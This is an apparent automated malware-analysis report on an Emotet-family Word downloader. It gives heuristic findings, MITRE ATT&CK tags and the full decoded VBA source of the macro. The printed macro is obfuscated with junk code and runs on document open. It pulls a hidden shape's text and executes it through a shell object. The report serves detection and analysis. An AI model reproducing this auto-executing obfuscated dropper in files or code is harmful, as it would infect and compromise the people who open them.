MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that attempts to execute a heavily obfuscated command. This command uses cmd.exe to construct and run a series of commands that appear to download and execute a second-stage payload from various URLs. The ClamAV detection and heuristic firings strongly indicate this is a downloader, likely belonging to the Emotet family.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6765661-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6765661-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set bYFnNGn = GetObject(cWPwwLaa + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + CwdIRZsX) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5778 bytes |
SHA-256: f8d0986b1070047fe24ca3c456131b5e17dfcd2bf87e6302956800d166feb6e4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
97 of 156 identifiers look randomly generated (e.g. 'wQkVJbHTP') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LjVRCKji"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case loHVWXk
Case 80319159
MDUABHfM = 187448629
CVZQASNmL = CLng(275924665)
Case 331791321
MIqMd = Oct(RWrscdC)
KXWbEMd = FBMXGCJlY
Case 146736848
GqMKodDv = CDate(GKtvO)
IpPkllc = Int(122502838 * oAFVO)
End Select
On Error Resume Next
Select Case VvPHTWd
Case 144763153
fkSiP = 87466176
OoiNokh = CLng(326979194)
Case 315152335
wvTjh = Oct(MaTomvhjQ)
JHLNpKYL = HWJmlOSL
Case 93543012
hCXwmGD = CDate(YmTGBzHaZ)
iQnXIwZb = Int(20710677 * iaUjTIii)
End Select
On Error Resume Next
Select Case PZIKziZc
Case 228726473
Fossl = 74435552
jZiRfT = CLng(240007200)
Case 167208556
kNOuO = Oct(bBZIiuBNA)
zdHPWuOiT = pfWjG
Case 155320614
vwMOnmGN = CDate(SdhYiMiah)
dKjpwjbHJ = Int(316548968 * qCGJGOnc)
End Select
On Error Resume Next
Select Case qFZzzLFl
Case 135044141
KXjwiKwiR = 120877643
OvBthw = CLng(100586756)
Case 145850035
noOjltQ = Oct(aoWXjNBOw)
CkkKVtQc = YEPOp
Case 98356384
LVJALltzD = CDate(vvihzfj)
MmqdTU = Int(106888528 * jsvKZ)
End Select
Set TGqwi = Shapes("kaqkDoaFLZ")
On Error Resume Next
Select Case UrjiVpTJp
Case 293380988
YTkcmDWLr = 244983583
tnBzhXtA = CLng(272051602)
Case 29122958
qMCQMQP = Oct(jUipORjds)
JYFFj = wdWHvQoDo
Case 323845315
YZWqFvs = CDate(PKwni)
tBvfjWlcE = Int(131089947 * uICTjfAR)
End Select
On Error Resume Next
Select Case tGzADmH
Case 289095135
wOiTItoXW = 242095076
BTtUL = CLng(239711111)
Case 80340396
EQKoEhMEo = Oct(iwXFfzZI)
YhPmKX = UZNip
Case 127218611
LnZlZdm = CDate(pAirolvow)
DYnOpiARw = Int(86208342 * qJzKVLSG)
End Select
qzTsjGpd = "" + ulIhZIwq + ZdsODSi + lQjmun + SZdhlvY + TGqwi.TextFrame.TextRange.Text + Vaahi + BaaNQiOU + rzzVuYU
On Error Resume Next
Select Case OOWHwVjn
Case 253359189
UjmunAVO = 49195321
hrIdd = CLng(151925004)
Case 305787287
XMfooml = Oct(EuHaknG)
aDMbRn = cPHGXGt
Case 196377167
aCQZBjv = CDate(JNvaGjYtl)
CaKTMjlCZ = Int(215156917 * OULQjziX)
End Select
On Error Resume Next
Select Case cFUNPr
Case 292336212
sPnttWKIp = 316472857
tqhmi = CLng(242063039)
Case 124226854
hoCSP = Oct(ASnOwK)
ziMMUZEi = ivkpEduSm
Case 189118066
lKCpzXcsD = CDate(utlLvLV)
OLOckGG = Int(225847014 * MXYVcTN)
End Select
Set bYFnNGn = GetObject(cWPwwLaa + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + CwdIRZsX)
On Error Resume Next
Select Case daWziZi
Case 37157448
jFQdf = 206102797
LQjZM = CLng(148568060)
Case 301475058
wCMKTh = Oct(IlvaJa)
XZtzA = qvCHUwVZO
Case 333017088
GjKCf = CDate(XmUUzf)
EVbHtGfN = Int(146057317 * VBzFpXLmt)
End Select
On Error Resume Next
Select Case UojsazLE
Case 269794384
WvoYYRFIJ = 197875701
JztSMR = CLng(2879560)
Case 29186304
MMaRYICAl = Oct(qpUBU)
nMHlktn = ZLrpZOi
Case 73885492
wlKVX = CDate(PPFWD)
XovZwYFt = Int(121514234 * TYwrN)
End Select
Const jYoqUUvb = 0
On Error Resume Next
Select Case JpqUzziu
Case 86553219
dzXik = 166716905
UBXEjUDQz = CLng(229270740)
Case 216542361
QmSVwNqw = Oct(FhRlvbp)
rQYTKaYZ = dVmDzOBJ
Case 323433426
KbYRtc = CDate(PTGTls)
jHSIRF = Int(75671177 * wQkVJbHTP)
End Select
On Error Resume Next
Select Case BstlHSX
Case 151439652
GzOaKRHX = 84143915
EcXFq = CLng(266147210)
Case 284879004
cPSjI = Oct(BHpdhdp)
TJfoVCi = VDvwl
Case 3486801
mDwPSvH = CDate(XonYCc)
piOaJNZ = Int(10445919 * oVauOo)
End Select
bYFnNGn.Run@ qzTsjGpd, jYoqUUvb
On Error Resume Next
Select Case BmKuAD
Case 342328610
dfKMpXH = 255171770
MwqZXiH = CLng(12070412)
Case 340652590
KrrRtvwA = Oct(RBUJCHwTM)
kjwiPj = iriDDsARp
Case 239374218
NRRsXPVZ = CDate(poRYPuoOF)
JcluQE = Int(143011697 * NJUrMXMF)
End Select
On Error Resume Next
Select Case fkwCcYuE
Case 49725432
EaQLO = 210776950
dJJPQudYf = CLng(247932713)
Case 173506905
lbCKp = Oct(rwJhaz)
ocsLjZ = wWWvwT
Case 103326796
SdwnUuVcB = CDate(auXhjv)
KwbSlNzM = Int(92550687 * PFHOWB)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.